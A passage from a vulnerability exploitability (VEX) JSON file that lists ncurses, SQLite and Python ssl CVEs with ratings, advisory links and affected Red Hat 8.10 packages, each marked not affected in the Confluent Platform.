          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2023-50495",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "description": "NCurse v6.4-20230418 was discovered to contain a segmentation fault via the component _nc_wrap_entry().",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2023-50495"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2023-50495"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/LU4MYMKFEZQ5VSCVLRIZGDQOUW3T44GT/"
        },
        {
          "url": "https://lists.gnu.org/archive/html/bug-ncurses/2023-04/msg00020.html"
        },
        {
          "url": "https://lists.gnu.org/archive/html/bug-ncurses/2023-04/msg00029.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-50495"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20240119-0008/"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-6684-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2023-50495"
        }
      ],
      "published": "2023-12-12T15:15:07+00:00",
      "updated": "2026-06-17T06:39:44+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10",
          "versions": [
            {
              "version": "6.1-10.20180224.el8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "6.1-10.20180224.el8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2024-0232",
      "ratings": [
        {
          "source": {
            "name": "bitnami"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.7,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        416
      ],
      "description": "A heap use-after-free issue has been identified in SQLite in the jsonParseAddNodeArray() function in sqlite3.c. This flaw allows a local attacker to leverage a victim to pass specially crafted malicious input to the application, potentially causing a crash and leading to a denial of service.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2024-0232"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2024-0232"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2243754"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QDCMYQ3J45NHQ4EJREM3BJNNKB5BK4Y7/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0232"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20240315-0007/"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2024-0232"
        }
      ],
      "published": "2024-01-16T14:15:48+00:00",
      "updated": "2026-06-17T06:53:02+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.26.0-20.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2024-0397",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "bitnami"
          },
          "score": 7.4,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        362
      ],
      "description": "A defect was discovered in the Python \u201cssl\u201d module where there is a memory\nrace condition with the ssl.SSLContext methods \u201ccert_store_stats()\u201d and\n\u201cget_ca_certs()\u201d. The race condition can be triggered if the methods are\ncalled at the same time as certificates are loaded into the SSLContext,\nsuch as during the TLS handshake with a certificate directory configured.\nThis issue is fixed in CPython 3.10.14, 3.11.9, 3.12.3, and 3.13.0a5.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2024-0397"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2024/06/17/2"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2024-0397"
        },
        {
          "url": "https://github.com/python/cpython/commit/01c37f1d0714f5822d34063ca7180b595abf589d"
        },
        {
          "url": "https://github.com/python/cpython/commit/29c97287d205bf2f410f4895ebce3f43b5160524"
        },
        {
          "url": "https://github.com/python/cpython/commit/37324b421b72b7bc9934e27aba85d48d4773002e"
        },
        {
          "url": "https://github.com/python/cpython/commit/542f3272f56f31ed04e74c40635a913fbc12d286"
        },
        {
          "url": "https://github.com/python/cpython/commit/b228655c227b2ca298a8ffac44d14ce3d22f6faa"
        },
        {
          "url": "https://github.com/python/cpython/commit/bce693111bff906ccf9281c22371331aaff766ab"
        },
        {
          "url": "https://github.com/python/cpython/commit/bce693111bff906ccf9281c22371331aaff766ab%20%283.13%29"
        },
        {
          "url": "https://github.com/python/cpython/issues/114572"
        },
        {
          "url": "https://github.com/python/cpython/pull/114573"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2024/12/msg00000.html"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/BMAK5BCGKYWNJOACVUSLUF6SFGBIM4VP/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0397"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20250411-0006/"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-6928-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2024-0397"
        }
      ],
      "published": "2024-06-17T16:15:10+00:00",
      "updated": "2026-06-17T06:53:24+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.8-77.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.8-77.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
